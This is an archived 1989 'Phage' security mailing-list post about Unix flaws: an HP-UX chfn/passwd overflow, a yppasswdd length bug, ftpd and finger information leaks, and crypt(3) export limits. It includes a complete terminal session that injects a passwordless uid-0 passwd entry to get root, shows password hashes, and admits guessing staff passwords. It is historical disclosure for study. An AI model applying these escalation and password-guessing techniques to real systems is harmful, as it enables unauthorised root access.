The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #372 [HP-UX 3.0, YP, ... FLAMES] (1 message, 4530 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/372.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Ning Zhang <zgdvda!zhang%uni-dortmund.de@RELAY.CS.NET>
To: phage
Date: Sat 07:00:43 18/02/1989 EST
Subject: HP-UX 3.0, YP, ... FLAMES
References: [Thread Prev: 370] [Thread Next: 373] [Message Prev: 370] [Message Next: 373]

Hi, everynoe in the list,

Recentely I was busy in my work, Chinese New Year, and out of the discussion
of security problems.  Now I just finished a part of my work and would like
to give something for security discussion.  Don't worry, be happy:-)


1. HP-UX 3.0 Experience

On Friday, we installed a HP 9000/835-SRX-Turbo workstation here.  So, I have
the chance to test the new system.  The graphics performance is very nice.
But it seems HP-UX is the worst operation system here (we also have Ultrix
2.x, 3.0, SunOS 3.5, 4.0, TRACE/UNIX 4.3BSD, UMIPS 3.10, etc).  The version
of HP-UX is "HP Release A.B3.00.5B" and was delivered in Dec, 88. All the
sendmail, ulimit, yp and passwd/chsh/chfn exist in HP-UX!!!  I remember
Paul Hite at PRC RS, VA, and somebody at HP have told me that the chfn bug
does not attack HP-UX.  Here I enclosed the script I exploited the chfn bug
on HP-UX 3.0.  It seems the chfn program of HP-UX has checked the length of
the GCOS field somewhere.  So the old method described in my chfn bug report
doesn't work directly.  But when I used the command sequence below, the bug
still occurs.  If the account has no passwd, the chfn & passwd commands are
enough, because the chfn command allows BUFSIZ-n (0 < n < 13) length password
entry, and after the password is add, the password entry becomes over-long!

If you dont like to see the hacking code, please skip it to next section.

Script started on Sat Feb 18 01:14:30 1989
$ csh
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10::/usr/guest:/bin/rsh
% chsh guest /bin/sh
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10::/usr/guest:/bin/sh
% chfn
Default values are printed inside of of '[]'.
To accept the default, type <return>.
To have a blank entry, type the word 'none'.

Name []: 1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111
Location (Ex: 42U-J4) []: 11111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111
Office Phone (Ex: 1632) []: 1111
Home Phone (Ex: 9875432) []: 11111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111

% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10:1111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111,11111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111,1111,1111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111:/usr/guest:/bin/sh
% grep guest /etc/passwd | wc
      1      1   1024
% chsh guest bin/csh
% grep guest /etc/passwd | wc
      1      1   1025
% passswd guest
Old password:
New password:
Re-enter new password:
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:wYqJJaf5ecYGw:100:10:1111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111,11111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111,1111,1111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111:/usr/guest:/bin/cs
h::0:0:::
::0:0:::
% su h
# echo > /etc/junk
/etc/junk: restricted
# echo > /tmp/junk
/tmp/junk: restricted
# cd /tmp
cd: restricted
# csh
# echo > /etc/junk
# echo > /tmp/junk
# ls -lag /etc/junk /tmp/junk
-rw-rw-rw-   1 root     root           0 Feb 18 01:22 /etc/junk
-rw-rw-rw-   1 root     root           0 Feb 18 01:21 /tmp/junk
# rm /etc/junk /tmp/junk
# exit
# exit
% exit
$ exit
script done on Sat Feb 18 01:24:35 1989


2. YP bug again!

About the yp bug, as I suggested before, it should limit the length of
encrypted password field.  Bobby Bodenheimer at Caltach has pointed out
that even the correct fix was installed for the chfn bug I found two
month ago, Sun's fix of yppasswdd still causes security problem, because
it checks the bad chars and converts them to '$' for identifying the bad
guy, but does not limit the length of the encrypted password field. What
I want to say here is: although the bad guy inserting the over-long password
can not change his password any more,  but after somebody else changes
his password or the bad guy can access another account, the bad password
entry will occur again. This can be done without the help of the chfn and/or
chsh commands! A good solution to the similar chfn attack is to rewrite
all the get/putpwent related stuff again.


3. Other old bugs

The 'ulimit' bug exists in the HP-UX 3.0 and MIPSCo's UMIPS 3.10, The sendmail
bugs in Ultrix (3.0 has not been tested), HP-UX and SunOS 3.x, the /dev/?mem
bug in many UNIX systems, etc. As I know, this bugs are all fixed by UCB
several years ago. My question is why do some vendors are so lazy to fix those
known security problems? UCB is a good example of those vendors, though it is
a non-PROFIT research institute. It seems the bad programming style has
caused many security problems. I've learnt a lot of things from those bugs.


4. Other possible problems

Maybe someone thinks the following problems are not important, please
ignore them.

One thing I've talked with Keith Bostic of UCB is about the response of FTP
daemon to a invalid user name. I've done some tests about the response time
of /bin/login and /etc/ftpd on Ultrix in China. The result showed that the
response of /etc/ftpd is much faster than /bin/login. Now, by looking into
the code of 4.3BSD ftpd picked up in the EUnet, I found the reason. When
ftpd finds the user name (using telnet hostname 23 to talk with ftpd directly)
is invalid, it gives a reply at once, does not ask and encrypt the password
further as /bin/login does for a considerable delay. I think the VAX/VMS
TCP Server 2.4 does a good job in the aspect.

About fingerd, a few years ago, one hacking student using fingerd on SUN
stoled a sysadmin's password stored in .netrc (which is very convenient
for FTP, rexec, rcmd and etc. By reading Gene Spafford's Internet Worm
report, it seems the worm has not exploited the .netrc file) and broke
in VAX-11/785.  Please clear the password stored in .netrc because there
are other possible ways to steal your password.

Again fingerd, I think it gives much info about users. We also made some
experiments on a PDP-11/23 running UNIX V6 to test how students choose their
password.  The result showed the birth day & place, name, room number,
freind's name etc, or some combinations of them were frequently used as
password.  When I got this result, I tried to guess password in VAX-11/785
which is only accessed by the institute staffs and and some grad students and
I successed many times. The best way in an untrusty environment is to
disable finger service.

The sendmail program is another quick way to get the user name. This can
be done by the EXPN commands. One bad thing is that the VAX/VMS Mail Server
2.4 gives a list of all user name in the VAX Cluster when it gets the
EXPN command.

The faking mail is also a problem. I just read from the netnews that someone
used the faking address (apollo@berkeley.edu) to send message to rec.music.misc
newsgroup and causes some pop fans' replies occur in the Apollo mail list :-)


5. FLAMES -- Is this the good strategy for security?

If you dont like flames, please skip the following.

FLAMES ON --- Multiflow TRACE/UNIX 4.3BSD is NOT shipped with CRYPT(3)

Recently, my work is to build a graphics application server on TRACE-7/300
which is called by users on the client machines for a distributive graphics
system model. The server dose the very heavy calculation and I planned
to implement a kind of authentication which only allows some valid users
can call the server by verifying the password and uid/gid.  But a very
strange thing is that TRACE/UNIX 4.3BSD is NOT shipped with the standard
C library functions - CRYPT(3), so I have no way to implement my original
plan.  I asked the sale representitive of Multiflow in Germany, he also has
no idea about that. I know the USA government forbids the export of DES
products out of the USA, except the object codes for authentication purpose
only.  Although there is no the crypt(1) command in the UNIX systems shipped
from the USA, the login(1), su(1) commands and the crypt(3) functions are
always included, except TRACE/UNIX. Why does the poor guy outside of the USA
have such inconvenience?  Maybe somebody is aware of the speed of the minisuper
can be used by some crackers to break password, somethings should be clarify:

o Our TRACE-7/300 can only be accessed by some really trusty researchers
  here, nobody is a cracker.

o MIPSCo M120, HP-9000/835 and TRACE-7/300 have almost the same integer
  performance (Dhrystone = 15000), and the first two machines DO have the
  CRYPT(3) functions.

o If you really are aware of the speed problem, you can make change of
  the DES algorithm and slow down it.

o As I know, the DES source code is floating around the world. Our UNIX
  machines made in Germany DO have the crypt(1) command. The fast DES
  algorithm company with the Worm source code is also floating around the
  Europe, at least.

Sigh!

Does anybody give us some help about the crypt(3) functions?
Thanks in advance!

FLAMES OFF!


Oh..., God, I think I've talked too much and I'm not sure all I said are right.
My brain seems damaged :-) If my opinions cause some inconvenience to you,
please forgive me.

It's the time for home, I need sleeping :-)

Goodbye,

Ning Zhang
<relay.cs.net!uka!unido!zgdvda!zhang>		Oh...God,
<pyramid.pyramid.com!tub!unido!zgdvda!zhang>		It's another bug...
<pyramid.pyramid.com!pcsbst!unido!zgdvda!zhang>

END OF DOCUMENT